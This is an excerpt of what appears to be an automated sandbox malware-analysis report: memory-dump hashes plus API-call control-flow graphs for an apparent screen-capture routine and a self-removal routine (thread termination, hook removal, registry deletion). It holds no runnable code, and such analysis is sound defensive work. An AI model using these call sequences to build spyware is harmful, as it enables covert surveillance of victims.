                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @
                                                  • API String ID: 0-2766056989
                                                  • Opcode ID: d5e9d99cca5bd5e192b92381c11644beefd2514f072827777375d50a0dc20ebe
                                                  • Instruction ID: bbd91956ea41f9089fdf4ea26de33e0e8d132f349ea16d9e77f48d305cf446da
                                                  • Opcode Fuzzy Hash: d5e9d99cca5bd5e192b92381c11644beefd2514f072827777375d50a0dc20ebe
                                                  • Instruction Fuzzy Hash: F1412975A183558FC340CF29D58020AFBE1FFC8318F645A1EF889A3350D379E9428B86
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c092c4f6b84b18e3b6cbbf7fe4413e1147b07dd6558fe569cc2693f6d3c9d2d8
                                                  • Instruction ID: 4200599dcb49c21c1ca78238ad82984ca11e49a574bdd01b256a4bdf4e559873
                                                  • Opcode Fuzzy Hash: c092c4f6b84b18e3b6cbbf7fe4413e1147b07dd6558fe569cc2693f6d3c9d2d8
                                                  • Instruction Fuzzy Hash: D2322521D69F414DE7239A35CC22336A24CBFB73C5F15D737E81AB5AAAEB29C4834105
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 51b096497e0208ccec2a2f4b5eaf582f7b18d03e206244163c5319e84589e6e5
                                                  • Instruction ID: 06c66d0f35fb266b7f69fbfce4f1f639eb17408d85dd7e5468211ecdc8378744
                                                  • Opcode Fuzzy Hash: 51b096497e0208ccec2a2f4b5eaf582f7b18d03e206244163c5319e84589e6e5
                                                  • Instruction Fuzzy Hash: 7932C2716087459BC715DF28C4807ABB7E5BF84318F040A3EF89587392D779D98ACB8A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cd36fe8c387ca2855096d15b7bf2cfed8e34aa58cb0db234df7a19e6c716ea84
                                                  • Instruction ID: b033fe34555866f616fd3cc64b543b740d9cc82fbf2d17309ab2a27531c6336b
                                                  • Opcode Fuzzy Hash: cd36fe8c387ca2855096d15b7bf2cfed8e34aa58cb0db234df7a19e6c716ea84
                                                  • Instruction Fuzzy Hash: 6C02CEB17046528BC358CF2EEC5053AB7E1AB8D311744863EE495C7781EB35FA22CB94
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 88b47d59bd8f9e39717b2a9a8c0dcea2e64fabbb26349240269cb2a589f8870d
                                                  • Instruction ID: 06b531cc06dcd57701b547059d2c567c45bbe225ee7d26ac7aed84b394be02a5
                                                  • Opcode Fuzzy Hash: 88b47d59bd8f9e39717b2a9a8c0dcea2e64fabbb26349240269cb2a589f8870d
                                                  • Instruction Fuzzy Hash: 2DF19D716142558FC348CF1DE8A187BB3E1FB89311B450A2EF582C3391DB79EA16CB56
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                  • Instruction ID: 2ce137016e68017aebaac4bbf916a57dff7c64f07ba89619fc9d118b501662d8
                                                  • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                  • Instruction Fuzzy Hash: F9C1D5B22091930AEF3D4639853063FFAA05E957B171A635FE4F2CB2D4FE18C924D514
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                  • Instruction ID: bc2d6065b6eca92eb436045fb502f22698d18e4b36ed1375ff5d5b4a3f5914d0
                                                  • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                  • Instruction Fuzzy Hash: 75C1D7722091930AEF2D4739853463FFAA15EA57B171A236FE4F2CB2D4FE28C924D514
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                  • Instruction ID: 708e8454946620f186a1700387687a053fc407bd339bf74556c1f47a113f5a1a
                                                  • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                  • Instruction Fuzzy Hash: 95C1C3B220D0930AEF3D4639853063FFAA15EA67B171A675ED4F2CB2D4FE18C924D614
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                  • Instruction ID: 79ee4f31eba35b7567f7a499d226924a3a6c1d38d98321864059dc3c63d33f3d
                                                  • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                  • Instruction Fuzzy Hash: 76C1E6B220D0930AEF3D4639853463FBAA15EA57B171A236FD4F2CB2D4FE18C924C614
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a138c4e0aeabb2bccdb66877e2b9435159f75a40726a9d3314504188017a6109
                                                  • Instruction ID: 096ff1c695f9ab27d4b2dbab46670c8098de74970727e2ec16deab2a6828ec1d
                                                  • Opcode Fuzzy Hash: a138c4e0aeabb2bccdb66877e2b9435159f75a40726a9d3314504188017a6109
                                                  • Instruction Fuzzy Hash: EAB1A37951429A8ACB05EF68C4913F63BA1EF6A301F0850B9EC9CCF757D2398506EB24
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 30caec0efc745099040319085d406cd9bdcff08e218f1b0552064e12ef4373be
                                                  • Instruction ID: 32d6082e35155a0a096806a6943d6f48c3d67459c64856e3d931f7c23e0710f9
                                                  • Opcode Fuzzy Hash: 30caec0efc745099040319085d406cd9bdcff08e218f1b0552064e12ef4373be
                                                  • Instruction Fuzzy Hash: 59618971202709A6EE34892B88967BF63949F6D314F10342FE983DB3C1D65DDD82931E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 341ce5e44018b0d8febb5363e57dd776d1ec6df4a054cddc6676df713c6a7dda
                                                  • Instruction ID: 5d22fc1bcc5d638cf6a4a0606be4d5c4d5bba199c703cf788a7f99cafe8d65e8
                                                  • Opcode Fuzzy Hash: 341ce5e44018b0d8febb5363e57dd776d1ec6df4a054cddc6676df713c6a7dda
                                                  • Instruction Fuzzy Hash: 12615871602718A6DA38592B88977BF2384EB2D344F94351BE483DB3C1D75EAD43871E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                  • Instruction ID: 6c705508b021f12d90b9f9697341ee8142861c1d23b7247138392dbd6e0aa073
                                                  • Opcode Fuzzy Hash: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                  • Instruction Fuzzy Hash: 59517671603604A7EF3445AB85567BF63899B0E304F18395FE882C73C2C52DDE02875E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f668ae4ce8ddce9dd25c23f8729a4a0b6b4a9a792d26258ec3aea80ac56d2768
                                                  • Instruction ID: d4d389248adab082d17fbdeb677dfbf93ddf16fcbb8c162b69e64d6cf0e33668
                                                  • Opcode Fuzzy Hash: f668ae4ce8ddce9dd25c23f8729a4a0b6b4a9a792d26258ec3aea80ac56d2768
                                                  • Instruction Fuzzy Hash: 61615B72A083059BC308DF35E481A5FB7E4AFCC718F814E2EF595D6151EA74EA08CB86
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                  • Instruction ID: 582e3a7babb983407823034c482dc4f24404013c153b7f4d28c3fef3b0c68a44
                                                  • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                  • Instruction Fuzzy Hash: 43113B7720034183D60CAA6DC4B45BBD795EADE320FBD627FF0414B744CA2AD4459508

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 794 418eb1-418ef8 CreateDCA CreateCompatibleDC call 419360 797 418efa-418efc 794->797 798 418efe-418f19 call 4193a2 794->798 797->798 799 418f1d-418f1f 797->799 798->799 802 418f71-418f78 call 402093 799->802 803 418f21-418f23 799->803 806 418f7d-418f89 802->806 803->802 804 418f25-418f5c call 4193d8 CreateCompatibleBitmap 803->804 809 418f8a-418f94 SelectObject 804->809 810 418f5e-418f6a DeleteDC * 2 804->810 811 418fa5-418fcc StretchBlt 809->811 812 418f96 809->812 813 418f6b DeleteObject 810->813 811->812 815 418fce-418fd3 811->815 814 418f97-418fa3 DeleteDC * 2 812->814 813->802 814->813 816 418fd5-418fea GetCursorInfo 815->816 817 41904f-419057 815->817 816->817 818 418fec-419000 GetIconInfo 816->818 819 419099-4190ab GetObjectA 817->819 820 419059-419060 817->820 818->817 821 419002-41904b DeleteObject * 2 DrawIcon 818->821 819->812 824 4190b1-4190c3 819->824 822 419062-419087 BitBlt 820->822 823 419089-419096 820->823 821->817 822->819 823->819 825 4190c5-4190c7 824->825 826 4190c9-4190d3 824->826 827 419100 825->827 828 4190d5-4190df 826->828 829 419104-41910d 826->829 827->829 828->829 830 4190e1-4190eb 828->830 831 41910e-419148 LocalAlloc 829->831 830->829 832 4190ed-4190f3 830->832 833 419154-41918b GlobalAlloc 831->833 834 41914a-419151 831->834 835 4190f5-4190fb 832->835 836 4190fd-4190ff 832->836 837 419196-4191ab GetDIBits 833->837 838 41918d-419191 833->838 834->833 835->831 836->827 839 4191d3-41929b call 4020df * 2 call 40250a call 403376 call 40250a call 403376 call 40250a call 403376 DeleteObject GlobalFree DeleteDC 837->839 840 4191ad-4191ce DeleteDC * 2 DeleteObject GlobalFree 837->840 838->814 857 4192a0-4192c4 call 402055 call 401fd8 * 2 839->857 858 41929d-41929e DeleteDC 839->858 840->802 857->806 858->857
                                                  APIs
                                                  • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418ECB
                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00418ED8
                                                    • Part of subcall function 00419360: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419390
                                                  • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F4E
                                                  • DeleteDC.GDI32(00000000), ref: 00418F65
                                                  • DeleteDC.GDI32(00000000), ref: 00418F68
                                                  • DeleteObject.GDI32(00000000), ref: 00418F6B
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00418F8C
                                                  • DeleteDC.GDI32(00000000), ref: 00418F9D
                                                  • DeleteDC.GDI32(00000000), ref: 00418FA0
                                                  • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418FC4
                                                  • GetCursorInfo.USER32(?), ref: 00418FE2
                                                  • GetIconInfo.USER32(?,?), ref: 00418FF8
                                                  • DeleteObject.GDI32(?), ref: 00419027
                                                  • DeleteObject.GDI32(?), ref: 00419034
                                                  • DrawIcon.USER32(00000000,?,?,?), ref: 00419041
                                                  • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00660046), ref: 00419077
                                                  • GetObjectA.GDI32(00000000,00000018,?), ref: 004190A3
                                                  • LocalAlloc.KERNEL32(00000040,00000001), ref: 00419110
                                                  • GlobalAlloc.KERNEL32(00000000,?), ref: 0041917F
                                                  • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004191A3
                                                  • DeleteDC.GDI32(?), ref: 004191B7
                                                  • DeleteDC.GDI32(00000000), ref: 004191BA
                                                  • DeleteObject.GDI32(00000000), ref: 004191BD
                                                  • GlobalFree.KERNEL32(?), ref: 004191C8
                                                  • DeleteObject.GDI32(00000000), ref: 0041927C
                                                  • GlobalFree.KERNEL32(?), ref: 00419283
                                                  • DeleteDC.GDI32(?), ref: 00419293
                                                  • DeleteDC.GDI32(00000000), ref: 0041929E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDisplayDrawEnumLocalSelectSettingsStretch
                                                  • String ID: DISPLAY
                                                  • API String ID: 4256916514-865373369
                                                  • Opcode ID: 752a6b17ac3a19c63de3538340b3712675aba42462517ef8f4f6b08987b87e88
                                                  • Instruction ID: 987d9a4534759b20ade43e5cc0d007ec6aae9fd5378911baa39845865ae00971
                                                  • Opcode Fuzzy Hash: 752a6b17ac3a19c63de3538340b3712675aba42462517ef8f4f6b08987b87e88
                                                  • Instruction Fuzzy Hash: D8C15C71504301AFD720DF25DC48BABBBE9EB88715F04482EF98993291DB34ED45CB6A

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 865 40d45b-40d471 call 41288b 868 40d473-40d478 call 40b8e7 865->868 869 40d47d-40d486 865->869 868->869 871 40d488 call 419b25 869->871 872 40d48d-40d494 869->872 871->872 874 40d496-40d4a2 call 401f04 call 41c322 872->874 875 40d4a7-40d4b7 872->875 874->875 877 40d4b9-40d4cd call 401f04 call 413a5e 875->877 878 40d4ce-40d4d9 875->878 877->878 881 40d4db-40d4ec call 401f04 call 413a5e 878->881 882 40d4ed-40d4f3 878->882 881->882 883 40d4f5-40d509 call 401f04 call 413a5e 882->883 884 40d50a-40d54c call 40247c call 401fab * 2 call 413733 882->884 883->884 905 40d55e-40d5a2 call 401fab RegDeleteKeyA SetFileAttributesW call 4077f2 884->905 906 40d54e-40d558 GetModuleFileNameW 884->906 911 40d5a4-40d5b4 call 401f04 SetFileAttributesW 905->911 912 40d5b6-40d60e call 43c11f call 40417e call 403014 call 401f09 call 40417e call 4042fc call 401f09 905->912 906->905 911->912 929 40d610-40d662 call 40417e call 4042fc call 403014 call 40325d call 401f09 * 3 912->929 930 40d667-40d6c2 call 40417e call 403014 * 2 call 40325d call 401f09 * 3 912->930 929->930 958 40d6d2-40d6e2 call 4077f2 930->958 959 40d6c4-40d6cd call 40908d 930->959 963 40d6e4-40d718 call 40b9b7 call 403014 call 40325d call 401f09 * 2 958->963 964 40d71d-40d7ea call 40417e * 2 call 40431d call 402fa5 call 403014 call 40325d call 401f09 * 5 call 40908d call 401f04 call 40247c call 401f04 call 41c482 958->964 959->958 963->964 1006 40d811-40d839 call 401f09 * 3 964->1006 1007 40d7ec-40d808 call 401f04 ShellExecuteW 964->1007 1007->1006 1012 40d80a-40d80b ExitProcess 1007->1012
                                                  APIs
                                                    • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,?,0040D84A), ref: 0041289B
                                                    • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF,?,0040D84A), ref: 004128AE
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D558
                                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D56B
                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D584
                                                  • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D5B4
                                                    • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,00000000,?,0040D47D,?,00000000), ref: 0040B8F6
                                                    • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32(00475100), ref: 0040B902
                                                    • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2A2,00000000,?,0040D47D,?,00000000), ref: 0040B910
                                                    • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C5A1,00000000,00000000,00000000), ref: 0041C4C1
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D7FF
                                                  • ExitProcess.KERNEL32 ref: 0040D80B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
